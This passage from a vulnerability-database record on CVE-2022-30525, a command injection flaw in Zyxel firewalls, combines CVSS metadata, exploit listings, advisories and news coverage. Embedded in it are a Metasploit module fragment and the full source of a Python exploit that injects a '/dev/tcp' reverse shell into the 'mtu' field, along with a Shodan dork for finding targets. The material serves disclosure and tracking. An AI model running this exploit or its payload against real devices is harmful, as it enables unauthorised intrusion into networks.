unauthenticated remote\n command injection vulnerability affecting Zyxel firewalls with zero\n touch provisioning (ZTP) support. By sending a malicious setWanPortSt\n command containing an mtu field with a crafted OS command to the\n /ztp/cgi-bin/handler page, an attacker can gain remote command execution\n as the nobody user.\n\n Affected Zyxel models are:\n\n * USG FLEX 50, 50W, 100W, 200, 500, 700 using firmware 5.21 and below\n * USG20-VPN and USG20W-VPN using firmware 5.21 and below\n * ATP 100, 200, 500, 700, 800 using firmware 5.21 and below\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'jbaines-r7' # Vulnerability discovery and Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2022-30525' ],\n [ 'URL', 'https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/']\n ],\n 'DisclosureDate' => '2022-04-28',\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_MIPS64,],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Shell Dropper',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_MIPS64],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'curl', 'wget' ],\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/mips64/meterpreter_reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n # Checks the build date that is embedded in the landing page. If it finds a build\n # date older than April 20, 2022 then it will additionally check if the model is\n # a USG FLEX, USG20[w]?-VPN, or an ATP system. 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-24T06:27:15", "id": "4504BF56-50B9-5F14-BA98-57209CC80328", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-23T17:02:41", "description": "# CVE-2022-30525\n####...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-15T06:20:06", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-15T06:24:15", "id": "A32ADBBF-016F-5C40-97B7-16216D138452", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, 
"privateArea": 1}, {"lastseen": "2022-05-24T01:10:15", "description": "# CVE-2022-30525\n\nZyxel \u9632\u706b\u5899\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\n\n## \u5f71\u54cd\u7ec4\u4ef6\nUSG FLEX 100...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T04:45:43", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-19T10:30:01", "id": "FBDACF27-8CBC-534F-9BB8-EFEF692738E0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-23T17:00:09", "description": "# CVE-2022-30525-mass\nzyxel firewall unauthenticated rce mass mu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-18T12:10:11", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-18T12:21:33", "id": "AFD45BD2-75E5-571A-865F-A4AEDEB3E36F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-13T22:57:03", "description": "## CVE-2022-30525 (Zyxel Firewall Remote Command Injection)\nA py...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T21:11:54", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-13T21:23:53", "id": "0A536389-CEE0-5E64-89BE-1A54E16285BE", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-24T07:15:43", "description": "# CVE-2022-30525\nCVE-2022-30525 POC exploit\n\n# Usage \n```shell\nu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T09:15:43", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-24T05:41:44", "id": "5C5D6632-39BD-58FA-BE17-3AD7021DD8EE", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-24T15:40:51", "description": "# CVE-2022-30525 by 1vere$k\n**Rapid7** discovered and reported a...", "cvss3": 
{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-23T16:51:42", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-24T13:23:56", "id": "4CA250E4-177A-50FF-AB65-51C71DE1DCA0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:10:27", "description": "# CVE-2022-30525 Zyxel \u9632\u706b\u5899\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\n\nCVE-2022-30525 POC&EXP \n\nauth...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-28T07:19:31", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel 
Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-29T14:38:48", "id": "6F26932E-1981-5C9F-B4CA-E98F18769C2F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-13T01:58:33", "description": "# CVE-2022-30525\nA OS Command Injection Vulnerability in the CGI...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T19:04:41", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2022-30525"], "modified": "2022-06-12T19:13:13", "id": "D1D08792-13CE-5DC6-B23F-F93330D78E39", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "attackerkb": [{"lastseen": "2022-06-03T19:56:50", "description": "A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at May 12, 2022 1:49pm UTC reported:\n\nThis vulnerability is an easy to exploit unauthenticated and remote OS command injection vulnerability. 
Please see the Rapid7 analysis for details.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-30525", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-12T00:00:00", "id": "AKB:0A065587-D7DE-4680-8C87-7E1C998210BC", "href": "https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2022-06-15T11:57:35", "description": "### *Detect date*:\n04/12/2022\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft System Center. 
Malicious users can exploit these vulnerabilities to cause denial of service, gain privileges.\n\n### *Affected products*:\nMicrosoft Endpoint Configuration Manager \nMicrosoft Malware Protection Engine\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-24548](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24548>) \n[CVE-2022-24527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24527>) \n\n\n### *Impacts*:\nDoS \n\n### *Related products*:\n[Windows Defender](<https://threats.kaspersky.com/en/product/Windows-Defender/>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "kaspersky", "title": "KLA12506 Multiple vulnerabilities in Microsoft System Center", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24527", "CVE-2022-24548"], "modified": "2022-06-15T00:00:00", "id": "KLA12506", "href": 
"https://threats.kaspersky.com/en/vulnerability/KLA12506/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-06-03T05:56:14", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "exploitdb", "title": "Zyxel USG FLEX 5.21 - OS Command Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-30525", "CVE-2022-30525"], "modified": "2022-06-03T00:00:00", "id": "EDB-ID:50946", "href": "https://www.exploit-db.com/exploits/50946", "sourceData": "# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection\r\n# Shodan Dork: title:\"USG FLEX 100\" title:\"USG FLEX 100W\" title:\"USG FLEX 200\" title:\"USG FLEX 500\" title:\"USG FLEX 700\" title:\"USG20-VPN\" title:\"USG20W-VPN\" title:\"ATP 100\" title:\"ATP 200\" title:\"ATP 500\" title:\"ATP 700\" title:\"ATP 800\"\r\n# Date: May 18th 2022\r\n# Exploit Author: Valentin Lobstein\r\n# Vendor Homepage: https://www.zyxel.com\r\n# Version: ZLD5.00 thru ZLD5.21\r\n# Tested on: Linux\r\n# CVE: CVE-2022-30525\r\n\r\n\r\nfrom requests.packages.urllib3.exceptions 
import InsecureRequestWarning\r\nimport sys\r\nimport json\r\nimport base64\r\nimport requests\r\nimport argparse\r\n\r\n\r\nparser = argparse.ArgumentParser(\r\n prog=\"CVE-2022-30525.py\",\r\n description=\"Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444\",\r\n)\r\nparser.add_argument(\"-u\", dest=\"url\", help=\"Specify target URL\")\r\nparser.add_argument(\"-r\", dest=\"host\", help=\"Specify Remote host\")\r\nparser.add_argument(\"-p\", dest=\"port\", help=\"Specify Remote port\")\r\n\r\nargs = parser.parse_args()\r\n\r\nbanner = (\r\n \"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7\"\r\n \"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg\"\r\n \"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg\"\r\n \"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8\"\r\n \"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg\"\r\n \"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n\"\r\n \"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp\"\r\n \"biA6KSApCg==\"\r\n)\r\n\r\n\r\ndef main():\r\n\r\n print(\"\\n\" + base64.b64decode(banner).decode(\"utf-8\"))\r\n\r\n if None in vars(args).values():\r\n print(f\"[!] 
Please enter all parameters !\")\r\n parser.print_help()\r\n sys.exit()\r\n\r\n if \"http\" not in args.url:\r\n args.url = \"https://\" + args.url\r\n args.url += \"/ztp/cgi-bin/handler\"\r\n exploit(args.url, args.host, args.port)\r\n\r\n\r\ndef exploit(url, host, port):\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\",\r\n \"Content-Type\": \"application/json\",\r\n }\r\n\r\n data = {\r\n \"command\": \"setWanPortSt\",\r\n \"proto\": \"dhcp\",\r\n \"port\": \"4\",\r\n \"vlan_tagged\": \"1\",\r\n \"vlanid\": \"5\",\r\n \"mtu\": f'; bash -c \"exec bash -i &>/dev/tcp/{host}/{port}<&1;\";',\r\n \"data\": \"hi\",\r\n }\r\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\r\n print(f\"\\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}\")\r\n\r\n try:\r\n response = requests.post(\r\n url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5\r\n )\r\n except (KeyboardInterrupt, requests.exceptions.Timeout):\r\n print(\"[!] Bye Bye hekcer !\")\r\n sys.exit(1)\r\n finally:\r\n\r\n try:\r\n print(\"[!] Can't exploit the target ! Code :\", response.status_code)\r\n\r\n except:\r\n print(\"[!] Enjoy your shell !!!\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50946", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-17T04:22:57", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhIGKFPN0camWO34C8CoXpDcrZclcT7c6-ypv1tJcY-mfhQARONnbO0PaDlZboql9V42YAGaZgoPskGrVz5tPzQqvfdgYybZ-X2zOlmjtLVkz9OH5WANIuEnYBVQc30Kolkv9Rtc75D-jj23bTt3pHK7G32wtGGb5Nb8OWMmKPNyPHPG4WsAjmBdYDm/s728-e100/firewall.jpg>) \n--- \nImage source: [z3r00t](<https://twitter.com/z3r00t/status/1524952406139748359>) \n \nThe U.S. 
Cybersecurity and Infrastructure Security Agency on Monday [added](<https://www.cisa.gov/uscert/ncas/current-activity/2022/05/16/cisa-adds-two-known-exploited-vulnerabilities-catalog>) two security flaws, including the recently disclosed remote code execution bug affecting Zyxel firewalls, to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), citing evidence of active exploitation.\n\nTracked as [CVE-2022-30525](<https://thehackernews.com/2022/05/zyxel-releases-patch-for-critical.html>), the vulnerability is rated 9.8 for severity and relates to a command injection flaw in select versions of the Zyxel firewall that could enable an unauthenticated adversary to execute arbitrary commands on the underlying operating system.\n\nImpacted devices include -\n\n * USG FLEX 100, 100W, 200, 500, 700\n * USG20-VPN, USG20W-VPN\n * ATP 100, 200, 500, 700, 800, and\n * VPN series\n\nThe issue, for which patches were released by the Taiwanese firm in late April (ZLD V5.30), became public knowledge on May 12 following a coordinated disclosure process with Rapid7.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj1WgS1ZJQACshVW-DJuxbFN1iHDnt93hQWGDuUdrvFT4dN9O8VSRWqAhjBgBDvYEOeuWDABBmMFdDdZjPtw8HVPmDj4N9WfJc1aC7gLju41YxO0oHtqBseAEBBTmgg29o4K2uVe5SNz5zIxmHk_wjNbUHTIlA8zl4nN8jjTHbQqSwId4h-uhDHrVx5/s728-e100/france.jpg>) \n--- \nSource: [Shadowserver](<https://twitter.com/Shadowserver/status/1525771529941921792>) \n \n \nMerely a day later, the Shadowserver Foundation [said](<https://twitter.com/Shadowserver/status/1525561213115158529>) it began detecting exploitation attempts, with most of the vulnerable appliances located in France, Italy, the U.S., Switzerland, and Russia.\n\nAlso added by CISA to the catalog is [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>), another code injection vulnerability in Spring Cloud Gateway that could be exploited to allow arbitrary remote execution on a 
remote host by means of a specially crafted request.\n\nThe vulnerability is rated 10 out of 10 on the CVSS vulnerability scoring system and has since been [addressed](<https://tanzu.vmware.com/security/cve-2022-22947>) in Spring Cloud Gateway versions 3.1.1 or later and 3.0.7 or later as of March 2022.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-17T03:17:00", "type": "thn", "title": "Watch Out! 
## Related coverage
The following entries are articles from The Hacker News (THN) that were indexed alongside this advisory. They concern a separate Rapid7 disclosure by the same researcher, the Zyxel firewall OS command injection CVE-2022-30525, and the Zyxel fixes that followed it.

### Hackers Begin Exploiting Recent Zyxel Firewalls RCE Vulnerability
* **Source:** [thehackernews.com/2022/05/watch-out-hackers-begin-exploiting.html](<https://thehackernews.com/2022/05/watch-out-hackers-begin-exploiting.html>)
* **Last updated:** 2022-05-17
* **CVEs referenced:** CVE-2022-22947, CVE-2022-30525

(Only the metadata for this entry survives on this page; the article body is not reproduced here.)

### Zyxel Releases Patch for Critical Firewall OS Command Injection Vulnerability
